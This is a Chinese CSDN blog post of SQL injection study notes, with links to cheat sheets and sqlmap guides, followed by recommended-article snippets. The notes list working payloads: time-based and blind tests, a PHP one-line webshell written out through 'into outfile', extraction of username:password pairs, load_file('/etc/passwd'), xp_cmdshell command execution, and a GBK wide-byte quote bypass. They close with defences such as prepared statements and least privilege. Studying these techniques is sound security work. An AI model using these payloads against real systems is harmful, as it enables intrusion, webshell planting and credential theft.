sql注入——资源记录

最新推荐文章于 2022-12-27 14:41:52 发布
最新推荐文章于 2022-12-27 14:41:52 发布
阅读量926 收藏
点赞数
分类专栏: web 文章标签: SQL Injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/50199407
版权

《sql注入攻击与防御(第二版)》:

SQL Injection Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsheet-oku


网络资料整理:

sqlmap用户手册:http://drops.wooyun.org/tips/143  续 http://drops.wooyun.org/tips/401

安全攻防之SQL注入(通过sqlmap搞定所有问题):http://www.cnblogs.com/Javame/p/3753060.html

手工注入经验总结:http://blog.csdn.net/eldn__/article/details/8203831



--以下记录来源于《白帽子讲web安全》

判断方法:

1. and 1=1 / and 1=2

2.mysql 中 id=1 and sleep(5)       #延时注入

3.mysql 中 benchmark(100000,encode(‘abc’,‘abc’)#延时注入

利用技巧:

1.mysql中常用的函数  database()  system_user()  current_user()  last_insert_id()

2.写入一句话:select "<?php eval($_POST[1]);?>" into outfile "网站绝对路径"

3.  id = 1 and substring(@@version,1,1)=5
4.  id = 1 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1) ,1,1 ) )>64
5.  id = 1 union select 1,1,load_file('/etc/passwd')
6. mssql中利用存储过程执行系统命令  EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
7. 数据库编码若为gbk 会把识别0xbf5c,addslashes会把 0x27变成0x5c27,那么构造payload 0xbf27,即可插入单引号注入。
8.sql column truncation是因为定义column长度varchar时值太小,若STRICT_ALL_TABLES开启,那么可以插入 溢出部分不同 的值会成功。

防御:

1.1预编译:绑定变量,不能改变sql的语义(也交参数化查询)

php中$stmt= $mysqli->prepare($query) $stmt->bind_param("sss",$var1,$var2,$var3);

1.2使用存储过程,调用存在数据库里的函数。

1.3设置变量的值,比如固定为integer

1.4使用定义好的安全函数来转义。

1.5设置数据库用户的最小权限。


2.1php中的过滤函数:

php.ini magic_quotes_gpc 开启的话,输入的字符串会被转义,多加一个\

若没有开启magic_quotes_gpc,用addslashes(),强制在单引号上加\(可能将0xbf27 变成0xbf 5c 27,如果数据库是gbk,会识别0xbf5c,统一编码即可解决)

mysql_real_escape_string() 考虑字符集

mysql_escape_string() 不考虑字符集 ( php5.3已经弃用)

think_ycx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring框架资源注入
我是猿小白的博客
04-25 839
一、DI是什么  DI是Dependency Injection,即依赖注入,DI实际上和IOC是一回事,只是观察的角度不同而已。  bean对象的创建依赖于容器,bean对象的创建依赖于资源(常量、对象、数组......)什么是注入?  注入:创建对象时所需要的资源由容器进行配置和注入,注入的过程也称为装配。二、注入的资源可以有哪些?    注入的资源可以是常量、对象、数组、集合等,下面就用ja...
sql注入总结
wuqiongrj的博客
07-22 7691
本实验测试是基于sqli-labs的实验环境 环境配置:php+mysql 环境搭建请参考 http://www.freebuf.com/articles/web/34619.html   Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的   sql注入分类: 基于联
SQL注入记录
zhuoyang111的博客
07-17 173
报错注入: oracle payload: 获取数据库版本 a' or (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum like 1)) from dual) like 'a 获取用户名 a' or (select dbms_xdb_version.makev...
简单的sql注入记录
最新发布
weixin_45292488的博客
12-27 34
萌新的sql注入
SQL注入的一次实操记录
qq_40481505的博客
07-21 444
1.sql注入点类型判断   对于一个sql注入点,存在两种不同的类型整型和字符串型,不同类型的sql语句存在差异 列如,假设有变量$id,当其为字符串型时,sql语句为: SELECT * FROM user WHERE id = '$id'; 而当$id为整型时,语句为: SELECT * FROM user WHERE id = $id; 这导致注入的内容会存在差异,因此在注入前需要确定...
PHP——SQL注入测试靶场
05-27
【PHP——SQL注入测试靶场】是一个用于学习和实践SQL注入漏洞的安全平台,它通过PHP编程语言构建,目的是帮助开发者和网络...通过像“PHP——SQL注入测试靶场”这样的资源,你可以不断提升自己的安全意识和防护能力。
SQL的注入攻击及防范措施探讨——以Microsoft SQL Server为例.pdf
09-19
SQL注入攻击是一种常见的网络安全威胁,尤其针对使用SQL数据库如Microsoft SQL Server的应用程序。攻击者通过在用户输入的数据中嵌入恶意SQL代码,欺骗服务器执行非预期的数据库操作,从而获取敏感信息、修改或删除...
ASP.NET源码——通用防SQL注入漏洞程序(Global.asax方式).zip
10-10
这个压缩包“ASP.NET源码——通用防SQL注入漏洞程序(Global.asax方式).zip”包含了一个源代码示例,专门针对防止SQL注入攻击。在深入探讨这个主题之前,我们先来理解SQL注入的基本概念及其危害。 SQL注入是一种常见...
精选_基于JAVA和SQL SERVER数据库实现的人力资源管理系统_源码打包
03-08
本系统——"基于JAVA和SQL SERVER数据库实现的人力资源管理系统",旨在提供一种高效、稳定、易于维护的解决方案,帮助企业管理员工信息、招聘、培训、考勤、薪酬等多个环节,提升人力资源管理效率。 一、JAVA技术栈...
BBS.rar_SQL 论坛_bbs
09-23
在安全性方面,论坛系统需要对用户输入进行验证和过滤,防止SQL注入攻击,同时,为了保护用户隐私,敏感信息如密码通常会进行加密存储。此外,考虑到性能,论坛可能还进行了缓存策略的实施,比如使用Redis缓存热门...
sql注入工具
11-27
sql注入工具 domian 很不错的一个工具 可以试试 sql注入工具
Xpath注入攻击及其防御技术研究
10-10
Xpath注入攻击及其防御技术研究 详细解释xpath攻击类型 与预防方法
开发技术 Web开发,防止url注入
11-09
这段程序是针对各业务系统通过URL进行越权注入进行控制的脚本
进程注入代码
03-21
插入进程注入Dll直接运行
分析SQL执行记录,发现SQL中的注入点
u014008201的博客
08-23 1753
不只一次有人对我说: SQL注入已经过时了。 现在的WEB应用已经很难被注入了。 还好最近看到一份针对乌云漏洞库的统计数据(https://zhuanlan.zhihu.com/p/21373306), 其结果明确的指出 SQL注入漏洞仍然是目前WEB应用中数量最多的漏洞。 亡羊补牢,不如思患预防,最完美解决SQL注入的方法是程序中没有SQL注入点。即程序中不使用字符串拼接SQL,而全部使用
注入攻击
weixin_51051051的博客
10-14 3310
注入攻击 OWASP将注入攻击和跨站脚本攻击(XSS)列入网络应用程序十大常见安全风险。实际上,它们会一起出现,因为 XSS 攻击依赖于注入攻击的成功。虽然这是最明显的组合关系,但是注入攻击带来的不仅仅是 XSS。 注入攻击代指一类攻击,它们通过注入数据到一个网络应用程序以期获得执行,亦或是通过非预期的一个方式来执行恶意数据。这种类别的攻击包括跨站脚本攻击(XSS)、SQL 注入攻击、头部注入攻击、日志注入攻击和全路径暴露。当然限于篇幅,这里只是一个简单的介绍。 这类攻击是每个程序员的梦魇。它们数量庞大、攻
sql注入资源
lastBeachhead的专栏
12-13 1242
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。     随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的
web安全学习------3.注入攻击基础知识详细介绍
阿柠xn
04-22 307
注入攻击分类 SQL注入 命令注入 XML注入 LDAP注入 SQL注入 概念: SQL的攻击方式是在客户端的输入数据中插入SQL命令,然后发送到 服务端,服务端对数据进行解析并执行非预期的操作。 可以SQL注入的条件: SQL语句中包含不可信任的数据,如用户输入等。 动态构建SQL语句。(比如说在名字中添加一些单引号,分号,来人为的改变select语句的形式,以达到自己想要输出的结果) ......

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值